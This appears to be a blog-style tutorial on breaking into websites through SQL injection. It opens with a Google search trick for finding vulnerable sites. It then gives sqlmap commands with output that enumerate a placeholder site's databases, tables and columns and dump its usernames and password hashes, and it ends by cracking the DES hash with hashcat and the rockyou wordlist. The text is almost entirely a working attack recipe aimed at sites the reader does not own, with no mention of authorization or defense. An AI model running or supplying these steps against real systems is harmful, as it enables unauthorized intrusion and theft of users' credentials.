Procedure 1:
Hacking a website and getting its database details can be done only with the vulnerable website to find these websites type inurl php id=” in google to get the sites
Fire up the terminal and type the following command
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
–dbs = Enumerate DBMS databases
This commands reveals some of the info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under ‘/usr/share/sqlmap/output/www.sqldummywebsite.com’
So, as you see there you have two database that we can look into. information_schema is a standard database for almost every MYSQL database. As per the sqldummywebsite database.
Procedure 2:
The List tables of will be displayed select the target database using SQLMAP SQL Injection
Now we have to do is that we have to know how many tables this sqldummywebsite database got and what are their names. To identify that out that information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Pretty good this database got 8 tables.
[10:56:20] [INFO] fetching tables for database: ‘sqldummywebsite’
[10:56:22] [INFO] heuristics detected web page charset ‘ISO-8859-2’
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
and then of course we want to check the inside user_info table using the SQLMAP SQL Injection as that table probably contains username and passwords.
Procedure 3:
List columns on target table of selected database using SQLMAP SQL Injection.we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns
This returns 5 entries from target table user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table ‘user_info’ in database ‘sqldummywebsite’
[10:57:18] [INFO] heuristics detected web page charset ‘ISO-8859-2’
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)
That our target is the table user_login and user_password .
Procedure 4:
List of the usernames we have got from the target columns of target table of selected database using the SQLMAP SQL Injection
Now , we have to do is just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
Using this we have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes
Procedure 5: Now we have to extract password from the target columns of target table of selected database using SQLMAP SQL Injection
Just use the below command to extract password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+—————+
| user_password |
+—————+
| 24iYBc17xK0e. |
+—————+
This is the hashed password. That’s the password is in the encrypted and now we have to decrypt it.
We have to decrypt the password extensively on using the Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux .
Procedure 6: Cracking password
Now we have the hashed password as 24iYBc17xK0e.
Procedure 6.a: Identify Hash type
Kali Linux provides us the tool and we can use tool to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:
hash-identifier
So below is DES(Unix) hash.
Procedure 7.b: Crack HASH using cudahashcat
First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES
I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt
so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.
